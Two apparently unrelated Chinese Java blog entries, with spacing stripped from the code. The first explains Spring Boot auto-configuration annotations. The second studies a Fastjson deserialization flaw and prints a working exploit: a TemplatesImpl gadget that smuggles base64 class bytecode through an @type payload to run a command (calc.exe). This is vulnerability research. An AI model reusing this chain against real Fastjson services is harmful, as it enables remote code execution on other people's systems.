java

HelloWorld探究1.POM文件父项目<parent><groupId>org.springframework.boot</groupId><artifactId>spring-boot-starter-parent</artifactId><version>2.3.2.RELEASE</version><relativePath/><!--lookupparentfromrepository--></parent>spring-boot-dependencies里面定义了jar包的版本2.导入依赖<dependency><groupId>org.springframework.boot</groupId><artifactId>spring-boot-starter-web</artifactId></dependency>spring-boot-starter:场景启动器,web帮我们导入了web模块正常运行的依赖组件SpringBoot将所有的功能场景都抽取出来,做成一个个的starters(启动器),只需要在项目里面引入这些starter相关场景的所有依赖都会导入进来。要用什么功能就导入什么场景的启动器2、主程序类,主入口类@SpringBootApplicationpublicclassDemoApplication{publicstaticvoidmain(String[]args){SpringApplication.run(DemoApplication.class,args);}}@SpringBootApplication:SpringBoot应用标注在某个类上说明这个类是SpringBoot的主配置类,SpringBoot就应该运行这个类的main方法来启动SpringBoot应用;@Target({ElementType.TYPE})@Retention(RetentionPolicy.RUNTIME)@Documented@Inherited@SpringBootConfiguration@EnableAutoConfiguration@ComponentScan(excludeFilters={@Filter(type=FilterType.CUSTOM,classes={TypeExcludeFilter.class}),@Filter(type=FilterType.CUSTOM,classes={AutoConfigurationExcludeFilter.class})})@SpringBootConfiguration:SpringBoot的配置类;标注在某个类上,表示这是一个SpringBoot的配置类;@Configuration:配置类上来标注这个注解;配置类-----配置文件;配置类也是容器中的一个组件;@Component@EnableAutoConfiguration:开启自动配置功能;以前我们需要配置的东西,SpringBoot帮我们自动配置;@EnableAutoConfiguration告诉SpringBoot开启自动配置功能;这样自动配置才能生效;@EnableAutoConfiguration:开启自动配置功能;以前我们需要配置的东西,SpringBoot帮我们自动配置;@EnableAutoConfiguration告诉SpringBoot开启自动配置功能;这样自动配置才能生效;@AutoConfigurationPackage@Import(EnableAutoConfigurationImportSelector.class)public@interfaceEnableAutoConfiguration{@AutoConfigurationPackage:自动配置包@Import(AutoConfigurationPackages.Registrar.class):Spring的底层注解@Import,给容器中导入一个组件;导入的组件由AutoConfigurationPackages.Registrar.class;==将主配置类(@SpringBootApplication标注的类)的所在包及下面所有子包里面的所有组件扫描到Spring容器;==@Import(EnableAutoConfigurationImportSelector.class);给容器中导入组件?EnableAutoConfigurationImportSelector:导入哪些组件的选择器;将所有需要导入的组件以全类名的方式返回;这些组件就会被添加到容器中;会给容器中导入非常多的自动配置类(xxxAutoConfiguration);就是给容器中导入这个场景需要的所有组件,并配置好这些组件;有了自动配置类,免去了我们手动编写配置注入功能组件等的工作;SpringFactoriesLoader.loadFactoryNames(EnableAutoConfiguration.class,classLoader);

java

这个漏洞一直只了解个大概,最近有空深入研究一下JAVA环境javaversion"1.8.0_211"Java(TM)SERuntimeEnvironment(build1.8.0_211-b12)JavaHotSpot(TM)64-BitServerVM(build25.211-b12,mixedmode)建立一个USER类publicclassUser{privateintage;publicStringusername;privateStringsecret;publicintgetAge(){returnage;}publicvoidsetAge(intage){this.age=age;}publicStringgetUsername(){returnusername;}publicvoidsetUsername(Stringusername){this.username=username;}publicStringgetSecret(){returnsecret;}@OverridepublicStringtoString(){returnthis.age+","+this.username+","+this.secret;}}函数作用JSON.toJSONString(Object)将对象序列化成json格式JSON.toJSONString(Object,SerializerFeature.WriteClassName)将对象序列化成json格式,并且记录了对象所属的类的信息JSON.parse(Json)将json格式返回为对象(但是反序列化类对象没有@Type时会报错)JSON.parseObject(Json)返回对象是com.alibaba.fastjson.JSONObject类JSON.parseObject(Json,Object.class)返回对象会根据json中的@Type来决定JSON.parseObject(Json,User.class,Feature.SupportNonPublicField);会把Json数据对应的类中的私有成员也给还原直接用网上的利用POCimportcom.sun.org.apache.xalan.internal.xsltc.DOM;importcom.sun.org.apache.xalan.internal.xsltc.TransletException;importcom.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;importcom.sun.org.apache.xml.internal.dtm.DTMAxisIterator;importcom.sun.org.apache.xml.internal.serializer.SerializationHandler;importjava.io.IOException;publicclasspocextendsAbstractTranslet{publicpoc()throwsIOException{Runtime.getRuntime().exec("calc.exe");}@Overridepublicvoidtransform(DOMdocument,DTMAxisIteratoriterator,SerializationHandlerhandler){}@Overridepublicvoidtransform(DOMdocument,com.sun.org.apache.xml.internal.serializer.SerializationHandler[]haFndlers)throwsTransletException{}publicstaticvoidmain(String[]args)throwsException{poct=newpoc();}}编译这个文件,将其内容进行base64编码,用fastjson把对象还原importjava.io.*;importjava.util.HashMap;importjava.util.Map;importcom.alibaba.fastjson.JSON;importcom.alibaba.fastjson.parser.Feature;importcom.alibaba.fastjson.parser.ParserConfig;importorg.apache.commons.io.IOUtils;importorg.apache.commons.codec.binary.Base64;publicclassVultest{publicstaticStringreadClass(Stringcls){ByteArrayOutputStreambos=newByteArrayOutputStream();try{IOUtils.copy(newFileInputStream(newFile(cls)),bos);}catch(IOExceptione){e.printStackTrace();}returnBase64.encodeBase64String(bos.toByteArray());}publicstaticvoidmain(String[]args)throwsUnsupportedEncodingException{ParserConfigconfig=newParserConfig();StringevilCode=readClass("D://code//fastjsonvul//target//classes//Poc.class");finalStringNASTY_CLASS="com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl";Stringtext1="{\"@type\":\""+NASTY_CLASS+"\",\"_bytecodes\":[\""+evilCode+"\"],'_name':'a.b','_tfactory':{},\"_outputProperties\":{},"+"\"_name\":\"a\",\"_version\":\"1.0\",\"allowedProtocols\":\"all\"}\n";Objectobj=JSON.parseObject(text1,Object.class,config,Feature.SupportNonPublicField);}}在excec下断点查看调用